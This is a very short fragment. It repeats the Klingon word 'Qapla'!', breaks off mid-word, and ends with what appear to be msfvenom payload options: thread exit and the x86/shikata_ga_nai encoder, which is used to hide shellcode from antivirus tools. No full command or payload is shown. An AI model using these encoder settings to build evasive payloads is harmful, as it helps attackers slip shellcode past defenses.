Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qap

EXITFUNC=thread -e x86/shikata_ga_nai